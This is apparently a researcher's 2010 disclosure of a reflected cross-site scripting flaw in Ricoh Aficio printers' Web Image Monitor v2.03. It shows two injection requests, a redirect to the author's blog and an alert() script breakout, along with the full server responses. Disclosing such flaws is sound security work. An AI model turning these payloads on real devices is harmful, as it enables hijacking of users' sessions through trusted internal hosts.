I was poking at some Ricoh MFPs several days ago, when I found this. It is nothing to get to terribly excited about as it's just a reflected XSS. However, the ability to abuse any trusted internal IP should be considered a threat. Companies have taken big hits from less. So without further ado, here are the petty little details: Tested successfully on numerous different Ricoh Aficio models, all running v2.03 of the Web Image Monitor interface. Responses included below are html encoded for your protection. Fun with Redirects: My inital test was just an abuse of the redirect functionality that is being exploited for the vector. GET /?";location.href="http://cosine-security.blogspot.com HTTP/1.1 HTTP/1.0 200 OK Date: Tue, 09 Nov 2010 17:58:00 GMT Server: Web-Server/3.0 Content-Type: text/html; charset=UTF-8 Content-Length: 683 Expires: Tue, 09 Nov 2010 17:58:00 GMT Pragma: no-cache Cache-Control: no-cache Set-Cookie: cookieOnOffChecker=on; path=/ Connection: close <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../"> <meta http-equiv="Cache-Control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> <title>Web Image Monitor</title> <script language="javascript"> <!-- function jumpPage(){ self.document.cookie="cookieOnOffChecker=on; path=/"; location.href="/web/guest/en/websys/webArch/mainFrame.cgi?";location.href=" http://cosine-security.blogspot.com"; } // --> </script> </head> <body onLoad="jumpPage()"></body> </html> A more traditional XSS test will still work just as well of course: Traditional Test: GET /?--></script><script>alert(51494)</script> HTTP/1.1 HTTP/1.0 200 OK Date: Fri, 29 Oct 2010 17:43:19 GMT Server: Web-Server/3.0 Content-Type: text/html; charset=UTF-8 Content-Length: 672 Expires: Fri, 29 Oct 2010 17:43:19 GMT Pragma: no-cache Cache-Control: no-cache Set-Cookie: cookieOnOffChecker=on; path=/ Connection: close <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1; URL=/web/guest/en/websys/webArch/message.cgi?messageID=MSG_JAVASCRIPTOFF&buttonURL=/../../../"> <meta http-equiv="Cache-Control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="-1"> <title>Web Image Monitor</title> <script language="javascript"> <!-- function jumpPage(){ self.document.cookie="cookieOnOffChecker=on; path=/"; location.href="/web/guest/en/websys/webArch/mainFrame.cgi?--></script><script>alert(51494)</script>"; } // --> </script> </head> <body onLoad="jumpPage()"></body> The same writeup, including a screenshot, can be found at http://cosine-security.blogspot.com/2010/11/ricoh-web-image-monitor-203-reflected.html